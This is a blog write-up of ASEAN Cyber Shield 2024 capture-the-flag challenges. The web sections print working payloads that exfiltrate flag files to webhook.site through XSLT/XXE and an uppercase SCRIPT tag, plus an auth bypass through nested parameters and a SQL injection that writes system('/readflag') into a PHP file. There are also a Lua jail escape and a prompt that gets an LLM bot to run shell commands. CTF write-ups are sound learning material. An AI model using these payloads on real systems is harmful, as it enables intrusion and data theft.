vicevirus’ Blog
ASEAN Cyber Shield 2024 Prelim and Finals Write-up
Introduction
From November 19 to 22, my team, Copi Kincau, and I participated in the ASEAN Cyber Shield Hacking Contest 2024. This prestigious event, organized by the Korea Internet and Security Agency (KISA) with support from ASEAN and South Korean governments, brought together 37 teams from 10 ASEAN countries.
Our Malaysia contingent this year consists of 2 teams for each category (Open, Student)
OPEN
- Sector Z
- Kopi David
STUDENT
- Copi Kincau
- Teh Tarik Cendol
The ASEAN Cyber Shield Hacking Contest 2024 featured preliminary rounds followed by a final attack-defense (blockchain) segment.
All the teams from the Malaysian contingent gave their best, showcasing exceptional talent and teamwork. It was truly inspiring to see how everyone pushed themselves to their limits, solving hard challenges together.
A big thank you to RE:HACK, NACSA, MKN for selecting to us to represent Malaysia this year for ACS and also their continuous support throughout the competition. We truly appreciate every bit of support given to us.
Also not to forget my super strong teammates for making all of this possible. Without them, it wouldn’t have been as much fun or even possible to make it to this stage. You guys rockksss <3
- zeynarz (super pro pwn player)
- tzion0 (super pro reverse player)
- fumio (super pro web player/solid dev skills)
Preliminary
Prelim Web
My First To do List
This challenge is a React Web challenge where you have to reverse it to get the flag. React compiled code is abit hard to read but not impossible.
Looking into the compiled JS file there few parts which makes up the flag.
let n = "";
for (let t of e) n += String.fromCharCode(5 ^ t.charCodeAt());
return String.fromCharCode(65, 67, 83, 123) + n + String.fromCharCode(125);
This function above will equal to ACS{ with n in the middle and ends with }
Some conditions to meet
a(e) {
return e[0] === 'w' || e[1] === '`';
}b(e) {
return e[4] === 's' || e[5] === '@';
}d0x123(e) {
return e[6] === 'W' || e[7] === '0';
}_(e) {
return e[8].charCodeAt() - 3 === 'I'.charCodeAt() || e[9].charCodeAt() - 5 === 'F'.charCodeAt();
}__(e) {
return (
e[10].charCodeAt() === 66 || // 'B'
e[11].charCodeAt() === 90 || // 'Z'
e[12].charCodeAt() === 36 || // '$'
e[13].charCodeAt() === 48 || // '0'
e[14].charCodeAt() === 90 || // 'Z'
e[15].charCodeAt() === 77 || // 'M'
e[16].charCodeAt() === 49 || // '1'
e[17].charCodeAt() === 119 || // 'w'
e[18].charCodeAt() === 65 // 'A'
);
}
We can solve it using Z3 to narrow down the values.
from z3 import *
# Create a list of 19 8-bit integer variables representing characters
e = [BitVec(f'e{i}', 8) for i in range(19)]
s = Solver()
# Characters are printable ASCII (excluding control characters)
for i in range(19):
s.add(e[i] >= 32, e[i] <= 126) # Printable ASCII range
# Constraint 1
s.add(Or(e[0] == ord('w'), e[1] == ord('')))
# Constraint 2
s.add(Or(e[2] == ord('E'), e[3] == ord('f')))
# Constraint 3
s.add(Or(e[4] == ord('s'), e[5] == ord('@')))
# Constraint 4
s.add(Or(e[6] == ord('W'), e[7] == ord('0')))
# Constraint 5
s.add(Or(e[8] - 3 == ord('I'), e[9] - 5 == ord('F')))
# Constraint 6
s.add(Or(
e[10] == 66, # 'B'
e[11] == 90, # 'Z'
e[12] == 36, # '$'
e[13] == 48, # '0'
e[14] == 90, # 'Z'
e[15] == 77, # 'M'
e[16] == 49, # '1'
e[17] == 119, # 'w'
e[18] == 65 # 'A'
))
# Solve the constraints
if s.check() == sat:
model = s.model()
# Extract the input string from the model
result = [chr(model[e[i]].as_long()) for i in range(19)]
input_string = ''.join(result)
print('Input string:', input_string)
# Compute the flag
def compute_flag(e_string):
n = ''
for t in e_string:
n += chr(ord(t) ^ 5)
flag = 'ACS{' + n + '}'
return flag
flag = compute_flag(input_string)
print('Flag:', flag)
else:
print('No solution found.')
## Flag : ACS{re@cvER5ING_!5_H4rD}
## have to guess one byte Flag: ACS{re@cvER5ING_!5_H4rD}Can you redirect me
For this challenge, to get the flag we must satisfy this condition.
if(new URL(final_url).hostname != "www.google.com"){
res.status(200);
res.send("<script>alert('FLAG{**REDACTED**}');history.back()</script>")
return
To satisfy this condition, we must redirect the bot to a location other than www.google.com
// check if hostname is google or not. If it is not google, then send status code 400
if(url.hostname != "www.google.com"){
res.status(400);
res.send("I ONLY trust GOOGLE");
return
}
var final_url = await bot(url);
The solution to this challenge is we can use Google Open Redirect www.google.com/amp/redirecthere.com
By sending this, we are able to get the flag.
/report?url=https://www.google.com/amp/httpforever.com
Flag: ACS{It_i5_JU$7_tr1Cky_tRiCK}Convert SVG to PNG
We were given a website where we can input an SVG file and it will be screenshotted and saved as .png image.
Looking at the code the /convert endpoint is the most interesting. Showed in the code, there’s two versions of convertSVG function.
app.post('/convert', async (req, res, next) => {
const svg = req.body.svg ? req.body.svg : '';
const test = req.body.test ? true : false;
const filename = uuidv4();
try {
if(test && svg){
const outputFilePath = path.join(imgDirectory, path.basename(filename.toLowerCase()) + '.png');
if(test == true){
await convertSvgV2(svg, outputFilePath);
}else{
await convertSvgV1(svg, outputFilePath);
}
res.status(200).send(`File converted and saved to ${outputFilePath}`);
}else{
res.status(500).send('Something went wrong.');
}
} catch (e) {
next(e);
}
})
The first version (convertSvgV1)
const convertSvgV1 = async (file, fpath) => {
try{
const svg = sanitizeInput(Buffer.from(file, "base64").toString('utf8'));
const png = await convert(svg,{ puppeteer: options });
fs.writeFile(fpath, png, (err) => { if(err){ console.log(err); } })
}catch(e){
console.log('v1 error', e);
}
}
The second version (convertSvgV2)
const convertSvgV2 = async (file, fpath) => {
let browser;
const filename = path.basename(fpath);
try {
const svg = sanitizeInput(Buffer.from(file, "base64").toString('utf8'));
fs.writeFileSync(fpath, svg);
browser = await puppeteer.launch(options);
const page = await browser.newPage();
await page.setJavaScriptEnabled(false);
await page.goto(`http://127.0.0.1:${port}/img/${filename}`, { timeout: 3000, waitUntil: 'domcontentloaded' });
await page.screenshot({ path: fpath });
await new Promise((page) => setTimeout(page, 1500));
await browser.close();
browser = null;
} catch (e) {
console.log('v2 error', e);
} finally {
if (browser) await browser.close();
}
}
After looking into both of the versions, it seems like the first version (v1) has some vulnerability of allowing XSS and are able to read file:///etc/passwd.
Reference: https://github.com/neocotic/convert-svg/issues/88
Though, no matter what we do it seems impossible to get to the condition of the first version (v1).
We are only left with second version (v2).
The v2 is pretty much impossible to execute XSS because of this line
await page.setJavaScriptEnabled(false);
But, we just realized that the endpoint /:directory(public|img)/:filename that hosts the file uses res.end instead of res.send . Thus with res.end there will be no Content-Type header set on any files on the path.
app.get('/:directory(public|img)/:filename', async(req, res) => {
try{
const directory = req.params.directory;
const filename = path.basename(req.params.filename);
const filePath = path.join(__dirname, directory, filename);
const fileContent = fs.readFileSync(filePath, 'utf8');
// interesting part
res.end(fileContent);
} catch (e) {
res.status(404).send({"message":"404 page not found"});
}
});
What we can do here is upload XSLT XML and let the bot visit it, rendering the XML (since no Content-Type header is set), make it request to internal /flag and send the flag to our webhook.
Reference: https://blog.ankursundara.com/dicectf23-writeups/#impossible-xss
Full solve script
import requests
import base64
from urllib.parse import urlencode
# Define the XSLT payload
xmls = """<?xml version="1.0"?>
<!DOCTYPE a [
<!ENTITY xxe SYSTEM "http://127.0.0.1:8000/flag" >]>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="1.0">
<xsl:template match="/asdf">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<img>
<xsl:attribute name="src">
https://webhook.site/9e?f=&xxe;
</xsl:attribute>
</img>
</BODY>
</HTML>
</xsl:template>
</xsl:stylesheet>"""
# Encode the XSLT as base64
xmls_base64 = base64.b64encode(xmls.encode()).decode()
# Define the main XML payload
xml = f"""<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="data:text/plain;base64,{xmls_base64}"?>
<asdf></asdf>"""
base64_encoded_xml = base64.b64encode(xml.encode()).decode()
# URL encode the XML payload
encoded_xml = urlencode({'svg': base64_encoded_xml, 'test': '0'})
# Define the target URL
url = "http://localhost:8000/convert"
# Define the headers
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
# Send the POST request
response = requests.post(url, headers=headers, data=encoded_xml)
# Print the response for debugging
print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")
Flag: ACS{f2e394eabe06f5a4193c5ceab4beaeb4}Prelim Reversing
CS1338: Script Programming
We were given a LUA bytecode file ver 5.4. This file can be decompiled with the tool unluac.
Reference: https://sourceforge.net/projects/unluac/
Decompiling, you will get an almost readable code (not really lmao)
local L0_1, L1_1
function L0_1(A0_2)
local L1_2, L2_2, L3_2, L4_2, L5_2, L6_2, L7_2, L8_2, L9_2, L10_2, L11_2, L12_2, L13_2, L14_2
L1_2 = "!@#"
L2_2 = "q\242\188f\179\174:p\149%\241\212v\179\154\182\163\216\181\176\1759\174t"
L3_2 = ""
L4_2 = 1
L5_2 = 1
L6_2 = #A0_2
L7_2 = 1
for L8_2 = L5_2, L6_2, L7_2 do
L10_2 = A0_2
L9_2 = A0_2.byte
L11_2 = L8_2
L9_2 = L9_2(L10_2, L11_2)
L11_2 = L1_2
L10_2 = L1_2.byte
L12_2 = L8_2 - 1
L13_2 = #L1_2
L12_2 = L12_2 % L13_2
L12_2 = L12_2 + 1
L10_2 = L10_2(L11_2, L12_2)
L11_2 = L10_2 * L4_2
L11_2 = L9_2 + L11_2
L11_2 = L11_2 % 256
L12_2 = L4_2 + L11_2
L4_2 = L12_2 % 16
L12_2 = L3_2
L13_2 = string
L13_2 = L13_2.char
L14_2 = L11_2
L13_2 = L13_2(L14_2)
L12_2 = L12_2 .. L13_2
L3_2 = L12_2
end
if L3_2 == L2_2 then
L5_2 = true
return L5_2
else
L5_2 = false
return L5_2
end
end
L1_1 = {}
L1_1.flag = L0_1
return L1_1
To reverse the function, we iterate through the target string, reverse the byte manipulation by subtracting the key byte (modified by a rolling state), and reconstruct the original input string (secret key) by applying inverse operations like modulo 256. The key is cyclically derived from !@#, and the rolling state updates after each character.
We can easily write a script to find the key and solve the challenge.
def reverse_flag():
target = "q\xF2\xBCf\xB3\xAE:p\x95%\xF1\xD4v\xB3\x9A\xB6\xA3\xD8\xB5\xB0\xAF9\xAEt"
key = "!@#"
secret = ""
L4_2 = 1 # Initialize state
for i in range(len(target)):
byte_target = ord(target[i]) # Current byte from target
byte_key = ord(key[(i % len(key))]) # Byte from key
original_byte = (byte_target - (byte_key * L4_2)) % 256 # Reverse the addition and mod
L4_2 = (L4_2 + byte_target) % 16 # Update the rolling state
secret += chr(original_byte) # Build the secret string
return secret
print("Recovered key:", reverse_flag())
# key: Pr0f3sS0r_10v3_Sc41pt1ng
Flag: ACS{feeea13a932b23ca408ed3cbf01e723e3726343a53bd67776caf9601cd20d637}Prelim Misc
Lutella
This seems like a Lua jail challenge.
function setModuleMethodsToNil(module)
for name, method in pairs(module) do
if type(method) == "function" then
module[name] = nil
end
end
end
local safe_method = {
line = io.lines,
close = io.close,
flush = io.flush,
open = io.open,
output = io.output,
type = io.type,
popen = io.popen,
input = io.input,
tmpfile = io.tmpfile,
dofile = dofile
}
debug.getregistry().safe_method = safe_method
local function init()
io.lines = nil
io.close = nil
io.flush = nil
io.open = nil
io.output = nil
io.type = nil
io.popen = nil
io.input = nil
io.tmpfile = nil
dofile = nil
setModuleMethodsToNil(os)
end
local function execute(code)
local wrappedCode = [[
return function()
]] .. code .. [[
end
]]
local func, err = loadstring(wrappedCode)
if not func then
return print("Error:", err)
end
local wrappedFunc = func()
local status, result = pcall(wrappedFunc)
if not status then
return print("Execution Error:", result)
end
return result
end
init()
print("Welcome to Lua Jail! Try to escape.")
while true do
io.write("lua> ")
local code = io.read("*l")
if code == "exit" then break end
execute(code)
end
This Lua jail can be bypassed because, while the init() function sets key I/O functions like io.open to nil to restrict access, the original references are still stored in the safe_method table, which is saved in debug.getregistry(). This registry is a special table that holds references to important Lua objects, allowing you to retrieve and use the original functions even after they are set to nil in the global scope.
Therefore, by accessing debug.getregistry().safe_method.open("flag","r"), you can still open and read files, effectively circumventing the intended jail restrictions.
Final payload:
print(debug.getregistry().safe_method.open("flag","r"):read("*a"))
Flag: ACS{Toast_and_chocolate_are_a_fantastic_combination}Finals
Finals Web
SimpleParser
It's a simple web which allows us fetch/parse HTML of any website.
Looking at the source code, it is using happy-dom to parse the HTML using the HTML_Parser function in the /target endpoint.
app.get("/target", (req, res) => {
var response = `
<html>
<head>
</head>
<body>
<form action="/target" method="POST">
<input type="text" placeholder="url" name="url">
<input type="submit" value="GO">
</form>
</body>
</html>
`
return res.send(response)
})
app.post("/target", async (req, res, next) => {
try {
var u = new URL(req.body.url);
let result = await HTML_Parser(u);
return res.send("<head><title>Your result is...</title></head>" + result);
} catch (e) {
console.log(e);
return next(e);
}
})async function HTML_Parser(url) {
var a = await axios.get(url);
const window = new happy.Window({
url: '<http://localhost:8080/>',
height: 1920,
width: 1080,
settings: {
navigator: {
userAgent: 'Mozilla/5.0 (X11; Linux x64) AppleWebKit/537.36 (KHTML, like Gecko) HappyDOM/2.0.0'
}
}
});
const DPurify = purify(window);
const res = DPurify.sanitize(a.data);
if (res.indexOf("script") != -1) {
return -1;
}
const document = window.document;
document.body.innerHTML += '<div class="container"></div>';
const container = document.querySelector('.container');
const button = document.createElement('button');
container.appendChild(button);
document.write(res);
let ret = document.body.innerHTML;
console.log(ret);
try {
window.happyDOM.close().catch((e) => {
console.log(e)
});
return ret;
} catch (e) {
console.log(e);
return "NOPE";
}
}
Additionally we found that the happy-dom package is vulnerable to CVE-2024-51757 when running npm audit.
Reference:
https://security.snyk.io/vuln/SNYK-JS-HAPPYDOM-8350065
Based on the SNYK article, we can use a <script> tag to achieve RCE.
Looking inside the file index.js, <script> tag seems to be blocked by this code filter below or is it..?
if (res.indexOf("script") != -1){
return -1;
}
Also this likely doesn't work as intended.
const DPurify = purify(window);
const res = DPurify.sanitize(a.data);
Now all that's left is to bypass the <script> tag. We can just use different case of <script> tag to bypass this since it's not a very strong filter.
Full payload
To solve this, we can host this code below on our own website or webhook.
<SCRIPT src="https://webhook.site/67c9c919-22fa-481f-a571-bff5e76f7207/'+require('fs').readFileSync('flag').toString()+'"></SCRIPT>
With this we our link to /target and we'll get the flag sent to our website/webhook.
Flag: ACS{ec023045-ef0a-4f36-8d51-af3bff63d554}Find Admin Info
For this challenge we were given a website where we can login as guest. What we need is to get admin access because the flag is located in admin's info.
Browsing through the code, it seems that this extended feature is turned on.
app.use(express.urlencoded({ extended: true }));
The extended: true option allows parsing of nested objects using the qs library, while false uses the simpler querystring library, which does not support nested structures.
With extended:true we are able to send nested objects to req.body, like how JSON usually works and the server is able to interpret it.
For example:
Request that you are sending.
user[name]=Alice&user[age]=25&preferences[color]=blue&preferences[subscribe]=trueRequest that the server is receiving/interpreting.
{
user: {
name: 'Alice',
age: '25'
},
preferences: {
color: 'blue',
subscribe: 'true'
}
}
Now, let's take a look at /login function first and see if this can be bypassed.
app.post('/login', (req, res) => {
const { username, password } = req.body;
db.query('SELECT * FROM user_info WHERE username = ? AND password = ?', [username, password], (err, results) => {
if (err) {
return res.status(500).send('Database error');
}
if (results.length > 0) {
req.session.loggedIn = true;
req.session.username = username;
res.redirect('/');
} else {
res.status(404).send('User not found');
}
});
});
Looking at the code above, it seems to be using parameterized queries which should be secure against SQL Injection right?
Well, technically yes, but somehow we can still trick the login authentication logic.
Due to extended: true, we can somehow confuse the backend by sending crafted inputs that exploit the nested parsing capability of the qs library. This allows us to manipulate the structure of req.body, resulting in unexpected behavior.
For instance, if we send the payload:
username[]=admin&password[username]=canbeanythingThe server will see this
{
username: [
'admin'
],
password: {
username: 'canbeanything'
}
}And the crafted SQL query becomes very weird and confused due to the unexpected structure of the parsed input.
The SQL query will then look like this:
SELECT * FROM user_info WHERE username = 'admin' AND password = `username` = 'canbeanything';
The back part of it is crucial because it will always be 0 if we specify a valid column name other than password (Chained comparison)
Note: backtick is usually used to enclose identifier such as column names, table names etc.
# this will be 0
password = `username` = 'canbeanything';# added bracket to make it easier to see, this will be 0
password = (`username` = 'canbeanything');
This allows us to login as admin without any valid password because effectively the query, if simplified, will be like this.
SELECT * FROM user_info WHERE username = 'admin' AND password = 0;
To solve the challenge, in the /login endpoint, we can pass something like this and we will be logged in as admin successfully.
// POST /login
username[]=admin&password[username]=canbeanything
Flag: ACS{H3l10_MY_N4M3_15_4dM1n~_~_f9384fji920192j48f}Alien Shop
For this challenge we were given a website where we can register, login and browse through characters.
We can see inside the code of character.php, this id param seems vulnerable to SQL Injection as user input is directly appended into the SQL query.
addslashes() here is useless because it can be easily bypassed using hex encoding.
if (!isset($_GET['id'])) {
echo "No character ID provided.";
exit();
}
$character_id = addslashes($_GET['id']);
$sql = "SELECT * FROM characters WHERE id=$character_id";
$result = $conn->query($sql);
if ($result->num_rows == 0) {
echo "Character not found.";
exit();
}
$character = $result->fetch_assoc();
Though, to get the flag, we need to execute /readflag binary somehow, which needs RCE/Code execution.
Luckily, there is something very interesting here which allows us to write our own PHP code and achieve RCE/Code execution.
Basically the code below will write some of the records in the session file DIRECTLY (which has the .php extension btw).
foreach ($session_files as $session_file) {
if (file_exists($session_file)) {
include $session_file;
if (!empty($records)) {
$latest_timestamp = max(array_column($records, 'timestamp'));
if (($now - $latest_timestamp) > 900) {
unlink($session_file);
}
}
}
}$session_file = "sessions/{$session_id}.php";
if (file_exists($session_file)) {
include $session_file;
} else {
$records = [];
}$file_content = "<?php\\n\\$records = array (\\n";
foreach ($records as $record) {
$file_content .= " array (\\n";
$file_content .= " \\"id\\" => \\"{$record['id']}\\",\\n";
$file_content .= " \\"name\\" => \\"{$record['name']}\\",\\n";
$file_content .= " \\"image_url\\" => \\"{$record['image_url']}\\",\\n";
$file_content .= " \\"timestamp\\" => {$record['timestamp']},\\n";
$file_content .= " ),\\n";
}
$file_content .= ");\\n";
file_put_contents($session_file, $file_content);All of these values above can be easily manipulated if we control the SQL query earlier.
Should be easy right?
Not really.. there's this big filter that is blocking every symbols/special characters for $REQUEST.
<?php
error_reporting(0);
function global_filter($input) {
$pattern = '/[^a-zA-Z0-9\\/\\-]/';
if (is_array($input)) {
foreach ($input as $key => $value) {
global_filter($value);
}
} else {
if (preg_match($pattern, $input)) {
die("Invalid Request");
}
}
}
global_filter($_REQUEST);
?>This filter seems pretty much impossible to bypass. Are we doomed?
Almost... this part actually requires a little bit of OSINT/guessing?. What we did was we searched for the filter code through Github and found an almost similar challenge.
In the similar challenge, they were given php.ini file which contains something like this.
request_order = "GP"
variables_order = "GPCS"
While the one given by organizer doesn't havephp.ini....
Assuming that this challenge have the same environment set as the one inside the write-up, we tried to replicate by doing the same configuration on our php.ini
To do the same as the write-up, how we can bypass the global_filter() is by sending another id param inside the cookies.
The bypass works by exploiting how PHP merges superglobal variables into $_REQUEST based on the request_order configuration.
Example:
-
The request sends
GET /character.php?id=3'(note that'is a blocked char). -
PHP processes
$_GETfirst, so$_REQUEST['id']is initially set to3'from the query string. -
The request also includes a Cookie header:
id=test. -
PHP then processes
$_COOKIEand overwrites$_REQUEST['id']with the value from the cookie (id=test). -
The final value of
$_REQUEST['id']becomestestdue to the overwrite from the cookie. -
Now our payload in the
$_GETwill never be blocked, because it only sees/verifies the$_COOKIESpart!
Now that we have SQL Injection possible...
What we can do is that we can just UNION SELECT and influence the value inside those records with valid PHP code and achieve RCE.
By sending a payload like this, we are able to write our own PHP code into the session file
?id=0 UNION SELECT 9999, 0x222e73797374656d28272f72656164666c616727292c2f2f, 0x6869, UNIX_TIMESTAMP(), NULL, NULL, NULL0x222e73797374656d28272f72656164666c616727292c2f2f = ".system('/readflag'),//
How the full request should look like
GET /character.php?id=0 UNION SELECT 9999, 0x222e73797374656d28272f72656164666c616727292c2f2f, 0x6869, UNIX_TIMESTAMP(), NULL, NULL, NULL HTTP/1.1
Host: 10.100.0.17:20012
Cache-Control: max-age=0
Accept-Language: en-GB,en;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: <http://10.100.0.17:20012/index.php>
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=f8ebf6b2ce9d281f0c3bc267c280b290; id=test
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
For clarity, this is how the PHP file will look like after sending the request.
<?php
$records = array (
array (
"id" => "9999",
"name" => "".system('/readflag'),//",
"image_url" => "hi",
"timestamp" => 1732725242,
),
);
Finally, you can browse to the file on /sessions/f8ebf6b2ce9d281f0c3bc267c280b290.php path and get the flag.
Flag: ACS{9c4f75a42121b81050cdc63f8a2eb208}Finals Crypto
Broken Algorithm
We just solved this by sending everything to ChatGPT lol.
encrypt.c
#include <string>
#include <random>
#include <cstring>
#include <fstream>
#define LENGTH 32
#define ROUNDS 16
void string_to_array(const std::string& str, uint64_t arr[4]) {
if (str.size() != 32) {
throw std::invalid_argument("String must be exactly 32 characters long.");
}
std::memcpy(arr, str.data(), 32);
}
std::string array_to_string(const uint64_t arr[4]) {
std::string str(32, '\0');
std::memcpy(&str[0], arr, 32);
return str;
}
class Cipher
{
private:
uint64_t round_key[0x10][0x2];
uint64_t round_function(uint64_t key_set[]);
uint64_t *do_something(uint64_t input[], uint64_t key[][2]);
public:
void generate_key();
void debug_key();
std::string encrypt(std::string &text);
std::string decrypt(std::string &text);
};
void Cipher::generate_key()
{
std::mt19937_64 mtRand(990929);
for(int i = 0; i < ROUNDS; ++i)
{
for(int j = 0; j < 2; ++j)
{
round_key[i][j] = mtRand();
}
}
}
void Cipher::debug_key()
{
std::ofstream of("debug.txt");
for(int i = 0; i < ROUNDS; ++i)
{
of << "ROUND " << i + 1 << ": ";
of << std::hex << round_key[i][0] << " and " << round_key[i][1] << std::endl;
}
of.close();
}
uint64_t Cipher::round_function(uint64_t round_key[])
{
uint64_t calc_result = 0;
calc_result = round_key[0] ^ round_key[1];
return calc_result;
}
std::string Cipher::encrypt(std::string &text)
{
uint64_t input[4];
string_to_array(text, input);
do_something(input, round_key);
return array_to_string(input);
}
std::string Cipher::decrypt(std::string &text)
{
uint64_t reverse_key[0x10][0x2];
uint64_t input[4];
string_to_array(text, input);
for(int i = 0; i < ROUNDS; ++i)
{
memcpy(reverse_key[i], round_key[ROUNDS - (i + 1)], 2 * sizeof(uint64_t));
}
do_something(input, reverse_key);
return array_to_string(input);
}
uint64_t *Cipher::do_something(uint64_t input[], uint64_t key[][2])
{
int32_t stage = 0;
uint64_t round_result = 0;
uint64_t left_backup_1 = 0;
uint64_t left_backup_2 = 0;
for(stage = 0; stage < ROUNDS; ++stage)
{
round_result = round_function(key[stage]);
left_backup_1 = input[0];
left_backup_2 = input[1];
input[0] = input[2];
input[1] = input[3];
input[2] = left_backup_1 ^ round_result;
input[3] = left_backup_2 ^ input[3];
}
return input;
}
int main(int argc, char *argv[])
{
std::string FLAG = "===REDACTED===";
Cipher crypt;
crypt.generate_key();
std::string ciphertext = crypt.encrypt(FLAG);
std::string plaintext = crypt.decrypt(ciphertext);
crypt.debug_key();
uint64_t debug[4];
string_to_array(ciphertext, debug);
std::ofstream of("flag.txt");
for(int i = 0; i < 4; ++i)
{
of << std::hex << "0x" << debug[i] << std::endl;
}
return 1;
}
rounds.txt
ROUND 1: 6dc81895ae813a8f and bb480b34dd202f6b
ROUND 2: 3f4522b6d868219e and 11647ab5744cf441
ROUND 3: 7e6f8fb03f8dd4d2 and 3cd4ded8f141cb1b
ROUND 4: 40951aaf6a773c91 and b7203549472c59f
ROUND 5: a97a21620d462115 and f61df74b53ad3e0a
ROUND 6: 2e323d2f157797a0 and f2e409646663d804
ROUND 7: 5c95c8175c1dbcbd and cc17b57e0549e380
ROUND 8: 8bfac590ed24d161 and e1d288b2507c1777
ROUND 9: 23264c8c8ab07f07 and e1817662291da932
ROUND a: 76128588f42d3d23 and dd00d5f31ee1b84d
ROUND b: 8c285992d104e0c and 717cf783f21c5da7
ROUND c: 8b8e95431a89c84b and 330330f63da9432c
ROUND d: c0162cb108aa237 and c61e460c333a7634
ROUND e: 2eef177f6bb640f8 and 5d91ee982564cfc7
ROUND f: 1936b7d7065157b6 and ca547056f47f4e1b
ROUND 10: d65ebab4c5d3baba and 85f1f47197f690da
flag.txt
0x8e134b4c2c1e6d6a
0x11723c32216c2338
0xa0e9767e6cbe017e
0x7d414841485f6567
This is what ChatGPT gave us and it solved it challenge.
# Decryption script for the provided cipher
import sys
def hex_str_to_int(s):
"""Convert a hexadecimal string to an integer."""
return int(s, 16)
def int_to_bytes_le(x):
"""Convert a 64-bit integer to 8 bytes in little-endian order."""
return x.to_bytes(8, byteorder='little')
def decrypt(ciphertext, round_keys):
"""
Decrypt the ciphertext using the provided round keys.
Args:
ciphertext (list of int): The ciphertext as a list of four 64-bit integers.
round_keys (list of tuples): A list of 16 tuples, each containing two 64-bit integers.
Returns:
list of int: The decrypted plaintext as a list of four 64-bit integers.
"""
# Reverse the round keys for decryption
reverse_keys = round_keys[::-1]
# Create a copy of the ciphertext to avoid modifying the original
input_arr = ciphertext.copy()
# Perform decryption for each round
for stage in range(16):
k1, k2 = reverse_keys[stage]
round_result = k1 ^ k2
# Backup the first two elements
left_backup_1 = input_arr[0]
left_backup_2 = input_arr[1]
# Shift the elements
input_arr[0] = input_arr[2]
input_arr[1] = input_arr[3]
# Apply the round transformations
input_arr[2] = left_backup_1 ^ round_result
input_arr[3] = left_backup_2 ^ input_arr[3]
return input_arr
def main():
# Define the round keys in the order provided
round_keys = [
(0x6dc81895ae813a8f, 0xbb480b34dd202f6b),
(0x3f4522b6d868219e, 0x11647ab5744cf441),
(0x7e6f8fb03f8dd4d2, 0x3cd4ded8f141cb1b),
(0x40951aaf6a773c91, 0xb7203549472c59f),
(0xa97a21620d462115, 0xf61df74b53ad3e0a),
(0x2e323d2f157797a0, 0xf2e409646663d804),
(0x5c95c8175c1dbcbd, 0xcc17b57e0549e380),
(0x8bfac590ed24d161, 0xe1d288b2507c1777),
(0x23264c8c8ab07f07, 0xe1817662291da932),
(0x76128588f42d3d23, 0xdd00d5f31ee1b84d),
(0x8c285992d104e0c, 0x717cf783f21c5da7),
(0x8b8e95431a89c84b, 0x330330f63da9432c),
(0xc0162cb108aa237, 0xc61e460c333a7634),
(0x2eef177f6bb640f8, 0x5d91ee982564cfc7),
(0x1936b7d7065157b6, 0xca547056f47f4e1b),
(0xd65ebab4c5d3baba, 0x85f1f47197f690da),
]
# Define the ciphertext as per flag.txt
ciphertext = [
0x8e134b4c2c1e6d6a,
0x11723c32216c2338,
0xa0e9767e6cbe017e,
0x7d414841485f6567,
]
# Perform decryption
plaintext_arr = decrypt(ciphertext, round_keys)
# Convert the decrypted integers to bytes (little-endian)
plaintext_bytes = b''.join([int_to_bytes_le(x) for x in plaintext_arr])
# Attempt to decode the bytes to a UTF-8 string
try:
plaintext = plaintext_bytes.decode('utf-8')
except UnicodeDecodeError:
# If decoding fails, display the plaintext in hexadecimal
plaintext = plaintext_bytes.hex()
print("Decrypted plaintext:")
print(plaintext)
if __name__ == "__main__":
main()
Basically what the script does is it takes the scrambled numbers and a set of secret keys to find the original message. It works backwards by using the keys in reverse order, mixing and shifting the numbers step by step. Finally, it turns the numbers back into readable text, showing the hidden message.
Flag: ACS{E4SY_F3ist3l_cha11enge_HAHA}Finals Misc
Mathboy
This is a simple LLM challenge where we can let the bot execute Python code. There isn’t any strong sanitization afaik and we can easily influence the bot.
By sending the prompt below, we are able to get the flag.
import os
content = print(os.popen('cat docker-compose.yml').read()
Flag: ACS{14e4cb53b11e67dc44d237aaf0d91687ae75b72751c458c39206513a21077db3}Backup Storage
For this challenge, we were given this description:
An ACS System developer hid a secret by leveraging AWS EBS snapshots on November 12, 2024.
How we solved this is by looking into public snapshots in region Seoul.
- Find “ACS Dev” in description of AWS public snapshots.
- Get the volume
- Attach the volume to any EC2
- Read flag inside
Create a volume with that snapshot
aws ec2 create-volume --snapshot-id snap-03164089d3905804f --region ap-northeast-2 --availability-zone ap-northeast-2a --volume-type gp2
Attach volume to any ec2, you can spin up your own EC2 instance for this.
aws ec2 attach-volume --volume-id vol-07ff2ac90b699b2b4 --instance-id <EC2_INSTANCE_ID> --device /dev/xvdf --region ap-northeast-2
SSH into the EC2 instance and mount the volume.
sudo mkdir /mnt/ebs
sudo mount /dev/xvdf1 /mnt/ebs
Walk around the files and folders…
Flag is supposed to be inside /home/ubuntu/flag.txt
ACS{825f20d26567384c8907e096dce174afbfc83fa402cffec42a999b151edd38d4}Finals Blockchain
doYouKnowMyPassword
This is a blockchain challenge which we need to obtain the correct password to gain ownership of the contract and kill it.
pragma solidity ^0.8.10;
import "./IChallengeManager.sol";
contract doYouKnowMyPassword{
IChallengeManager public manager;
address public owner;
address public challenger;
bytes32 codeHash;
bytes32 password;
constructor(){}
modifier validate{
manager.validContractInitialized();
manager.validCurrentRound(challenger, codeHash);
manager.validCaller(msg.sender);
_;
}
fallback() external payable {}
function initialize() external{
require(password == bytes32(0), "already initialized");
password = keccak256(abi.encodePacked(address(this), challenger,
block.number, block.timestamp, blockhash(block.timestamp),
msg.data, gasleft(), blockhash(block.number), block.gaslimit));
}
function transferOwnership(address) public validate{
owner = msg.sender;
}
function verifyPassword(bytes32 _passwd) external validate{
if( keccak256(abi.encodePacked(_passwd)) == keccak256(abi.encodePacked(password)))
transferOwnership(msg.sender);
}
function kill() external validate{
require(msg.sender == owner, "OWNER ONLY");
manager.confirmKill(challenger, codeHash);
selfdestruct(payable(address(manager)));
}
}
There’s likely two ways to solve this challenge.
One is by bruting/finding all these values.
password = keccak256(abi.encodePacked(address(this), challenger,
block.number, block.timestamp, blockhash(block.timestamp),
msg.data, gasleft(), blockhash(block.number), block.gaslimit))
The other one is we can just read from storage slot: 4 because how it is stored/defined here.
